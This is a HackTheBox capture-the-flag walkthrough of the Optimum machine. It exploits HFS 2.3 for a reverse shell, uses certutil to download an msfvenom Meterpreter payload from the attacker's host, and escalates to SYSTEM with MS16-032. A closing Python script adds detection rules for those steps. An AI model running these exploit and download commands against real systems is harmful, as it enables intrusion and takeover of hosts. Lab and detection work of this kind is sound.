This is a retired machine of HackTheBox.

It’s rated as quite easy, so try it for yourself first! Come back only if you feel stuck 🙂.
Let’s begin!
Table of Contents
- Port Scanning
- Searching for vulnerabilities
- Getting a shell
- Upgrading shell to meterpreter
- Privilege escalation
Port Scanning
Let’s start checking which ports are open, with the help of nmap:
kali@kali ~/H/Optimum> sudo nmap -p- -T4 -A -oN nmap.results 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 13:16 EDT
Nmap scan report for 10.10.10.8
Host is up (0.046s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
I guess there’s not much to say here 😛
Searching for vulnerabilities
When I see a service version, I immediately query searchsploit for exploits against it (most often even before googling).
kali@kali ~/H/Optimum> searchsploit HttpFileServer 2.3
Exploits: No Results
Shellcodes: No Results
No luck…
But wait! Sometimes exploits are named differently, for instance using only the initials of the service. Let’s try that:
kali@kali ~/H/Optimum> searchsploit HFS 2.3
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)                    | multiple/remote/48569.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                 | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)            | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)            | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution       | windows/webapps/34852.txt
Looks like we have a lot of options here.
Note that if you google for an exploit, you can easily find one that is already built into Metasploit; however, let’s take the slightly harder route.
Getting a shell
I chose the second-last exploit, because it’s written in Python, so we can run it directly.
To copy the exploit, type this:
kali@kali ~/H/Optimum> searchsploit -m windows/remote/39161.py
  Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
      URL: https://www.exploit-db.com/exploits/39161
     Path: /usr/share/exploitdb/exploits/windows/remote/39161.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
Copied to: /home/kali/HackTheBox/Optimum/39161.py
Now, after reading its source, you can see that it requires you to change your IP and port:

After changing it, remember to start a netcat before running the exploit.
kali@kali ~/H/Optimum> nc -vlp 9090
listening on [any] 9090 …
Oh and I hope you have read the exploit’s description, because it asks you to host a webserver to serve netcat!
kali@kali ~/H/O/http> wget https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
--2020-08-15 13:54:36--  https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip
Resolving eternallybored.org (eternallybored.org)… 84.255.206.8, 2a01:260:4094:1:42:42:42:42
Connecting to eternallybored.org (eternallybored.org)|84.255.206.8|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 109604 (107K) [application/zip]
Saving to: ‘netcat-win32-1.11.zip’
netcat-win32-1.11.zip 100%[=======================================================>] 107.04K 585KB/s in 0.2s
2020-08-15 13:54:37 (585 KB/s) - ‘netcat-win32-1.11.zip’ saved [109604/109604]
kali@kali ~/H/O/http> unzip netcat-win32-1.11.zip
Archive:  netcat-win32-1.11.zip
  inflating: netcat-1.11/doexec.c
  inflating: netcat-1.11/generic.h
  inflating: netcat-1.11/getopt.c
  inflating: netcat-1.11/getopt.h
  inflating: netcat-1.11/hobbit.txt
  inflating: netcat-1.11/license.txt
  inflating: netcat-1.11/Makefile
  inflating: netcat-1.11/nc.exe
  inflating: netcat-1.11/nc64.exe
  inflating: netcat-1.11/netcat.c
  inflating: netcat-1.11/readme.txt
kali@kali ~/H/O/http> cd netcat-1.11/
Now it’s time to serve it for the exploit; for that we’ll use the http.server module of Python 3:
kali@kali ~/H/O/h/netcat-1.11> sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
Note: If you don’t modify the exploit, you must use port 80, and for that you need sudo.
Time to (finally) run the script!
kali@kali ~/H/Optimum> python 39161.py 10.10.10.8 80
(assuming you have read the usage part of the script :P)
Then in the netcat:
kali@kali ~/H/Optimum [1]> nc -vlp 9090
listening on [any] 9090 …
10.10.10.8: inverse host lookup failed: Unknown host
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49171
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas

C:\Users\kostas\Desktop>
Upgrading shell to meterpreter
On Windows machines, I always like to upgrade the shell to Meterpreter (privilege escalation is way easier that way).
Let’s try it, but first, let’s check which architecture Windows is running on:
C:\Users\kostas\Desktop>systeminfo
systeminfo

Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
...
System Model:              VMware Virtual Platform
System Type:               x64-based PC
It’s x64, so now we need to generate an x64 Meterpreter payload that will give us a reverse Meterpreter shell:
kali@kali ~/H/O/http> msfvenom -f exe -o payload.exe -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.25 LPORT=4040
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 201283 bytes
Final size of exe file: 207872 bytes
Saved as: payload.exe
kali@kali ~/H/O/http>
That command generates an exe file of payload type meterpreter_reverse_tcp for x64 Windows, with my IP and an arbitrary port.
The second step is setting up the handler/listener for it:
kali@kali ~/H/Optimum> msfconsole -q
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
It gave us a default payload; let’s specify the one we want.
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
Now the LHOST and LPORT (ours, the same ones we specified in msfvenom):
msf5 exploit(multi/handler) > set LHOST 10.10.14.30
LHOST => 10.10.14.30
msf5 exploit(multi/handler) > set LPORT 4040
LPORT => 4040
Then start it.
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.30:4040
As for the third step, all that’s left to do is get it onto the target and execute it.
As we did for netcat, we’ll now serve payload.exe over HTTP.
kali@kali ~/H/O/http> sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
Now on the target (hopefully your shell hasn’t died yet), we’ll use certutil.exe to download the payload from our machine.
C:\Users\kostas\Desktop>certutil.exe -urlcache -split -f "http://10.10.14.30/payload.exe" payload.exe
certutil.exe -urlcache -split -f "http://10.10.14.30/payload.exe" payload.exe
**** Online ****
000000 …
032c00
CertUtil: -URLCache command completed successfully.
It downloaded successfully; we can also verify that in the Python output:
kali@kali ~/H/O/http> sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
10.10.10.8 - - [15/Aug/2020 18:45:01] "GET /payload.exe HTTP/1.1" 200 -
10.10.10.8 - - [15/Aug/2020 18:45:01] "GET /payload.exe HTTP/1.1" 200 -
Let’s execute it!
C:\Users\kostas\Desktop>.\payload.exe
.\payload.exe
Your msfconsole should now light up.
[*] Started reverse TCP handler on 10.10.14.30:4040
[*] Meterpreter session 1 opened (10.10.14.30:4040 -> 10.10.10.8:49186) at 2020-08-15 18:47:26 -0400
meterpreter > getuid
Server username: OPTIMUM\kostas
Privilege escalation
Time to get to the root of it.
It’s always a good idea to try the script kiddie’s friend:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Well, it didn’t hurt to try.
Let’s search for privilege escalation exploits for this Windows version (which we noted earlier).

The title is:
Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) (PowerShell)
We can search for that vulnerability ID in Metasploit to see if there’s already a module for it.
msf5 exploit(multi/handler) > search MS16-032
...
0  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21  normal  Yes  MS16-032 Secondary Logon Handle Privilege Escalation
And it looks like we’re golden!
Let’s give it a go.
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.14.30
LHOST => 10.10.14.30
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 5050
LPORT => 5050
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 10.10.14.30:5050
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\RSKjjO.ps1…
[*] Compressing script contents…
[+] Compressed size: 3592
[*] Executing exploit script…
...
[!] Holy handle leak Batman, we have a SYSTEM shell!!
UPU6QGcJqNltAv0NTRCUVZ3MEdCGZC1P
[+] Executed on target machine.
[*] Sending stage (176195 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.30:5050 -> 10.10.10.8:49187) at 2020-08-15 19:00:17 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\RSKjjO.ps1
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
And we’re done!
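Seen from the blue team’s side, the two host-side steps in this write-up leave very recognisable process-creation events: certutil.exe fetching payload.exe with -urlcache, that file then being launched from the user’s Desktop, and the MS16-032 module dropping a .ps1 into the user’s Temp folder and running it through SysWOW64 PowerShell. The script below is an added example, not part of the original write-up, of Metasploit, or of any other tool mentioned here. It runs three detection rules over constructed process-creation records in a made-up pipe-delimited layout (timestamp|user|parent image|image|command line); Sysmon Event ID 1 and Security event 4688 carry those same fields, but the layout here is an assumption of this example only. The PowerShell command line is likewise an assumption: the module output above only shows that it used SYSWOW64 powershell and wrote RSKjjO.ps1 to Temp, not the exact invocation. Two ordinary certutil and PowerShell lines are included to show the rules stay quiet on them.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcessEvent:
    ts: str        # event time (UTC, ISO 8601)
    user: str      # account that started the process
    parent: str    # parent image path
    image: str     # image path of the new process
    cmdline: str   # full command line


@dataclass
class Finding:
    ts: str
    rule: str
    detail: str


# Constructed sample log (pipe-delimited, one process creation per line).
# The first three lines mirror the steps in the write-up; the last two are
# ordinary certutil/PowerShell use that the rules must not flag.
SAMPLE_LOG = """\
2020-08-15T22:45:01Z|OPTIMUM\\kostas|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -urlcache -split -f "http://10.10.14.30/payload.exe" payload.exe
2020-08-15T22:47:20Z|OPTIMUM\\kostas|C:\\Windows\\System32\\cmd.exe|C:\\Users\\kostas\\Desktop\\payload.exe|.\\payload.exe
2020-08-15T23:00:10Z|OPTIMUM\\kostas|C:\\Users\\kostas\\Desktop\\payload.exe|C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\kostas\\AppData\\Local\\Temp\\RSKjjO.ps1
2020-08-15T23:05:00Z|OPTIMUM\\kostas|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\certutil.exe|certutil.exe -verify C:\\Users\\kostas\\Documents\\server.cer
2020-08-15T23:06:00Z|OPTIMUM\\kostas|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\Scripts\\inventory.ps1
"""

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# A .ps1 script sitting under the per-user %TEMP% directory
TEMP_PS1_RE = re.compile(r"\\appdata\\local\\temp\\\S+\.ps1", re.IGNORECASE)


def parse_log(text: str) -> List[ProcessEvent]:
    """Split the constructed pipe-delimited log into ProcessEvent records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, parent, image, cmdline = line.split("|", 4)
        events.append(ProcessEvent(ts, user, parent, image, cmdline))
    return events


def basename(path: str) -> str:
    """Last component of a Windows path or URL, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def detect(events: List[ProcessEvent]) -> List[Finding]:
    findings: List[Finding] = []
    # Files certutil has been seen writing from a URL: output name -> (ts, url)
    downloaded: Dict[str, Tuple[str, str]] = {}

    for ev in events:
        image = basename(ev.image)
        cmd = ev.cmdline.lower()

        # Rule 1: certutil used as a downloader (-urlcache with a URL argument)
        if image == "certutil.exe" and "-urlcache" in cmd:
            m = URL_RE.search(ev.cmdline)
            if m:
                url = m.group(0).strip('"')
                # certutil writes to its last argument; if no output name was
                # given the last token is the URL itself, whose basename is used
                out_name = basename(ev.cmdline.split()[-1].strip('"'))
                downloaded[out_name] = (ev.ts, url)
                findings.append(Finding(ev.ts, "certutil_download",
                                        f"certutil fetched {url} as {out_name}"))

        # Rule 2: a binary certutil just wrote is executed from a user profile path
        if image in downloaded and ev.image.lower().startswith("c:\\users\\"):
            dl_ts, url = downloaded[image]
            findings.append(Finding(ev.ts, "downloaded_binary_executed",
                                    f"{ev.image} run by {ev.user}; fetched at {dl_ts} from {url}"))

        # Rule 3: 32-bit PowerShell (SysWOW64) running a script out of %TEMP%,
        # the pattern the MS16-032 module output above describes
        if image == "powershell.exe" and "\\syswow64\\" in ev.image.lower():
            m = TEMP_PS1_RE.search(ev.cmdline)
            if m:
                findings.append(Finding(ev.ts, "syswow64_powershell_temp_script",
                                        f"SysWOW64 powershell ran ...{m.group(0)} (parent {ev.parent})"))
    return findings


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f"{f.ts}  {f.rule:32}  {f.detail}")
```

Rule 2 is the one worth keeping even where certutil downloads are noisy on their own: correlating the written filename with a later execution from a user-writable path turns two weak signals into one strong one, and the same join works for other download-capable signed binaries once their output argument is parsed.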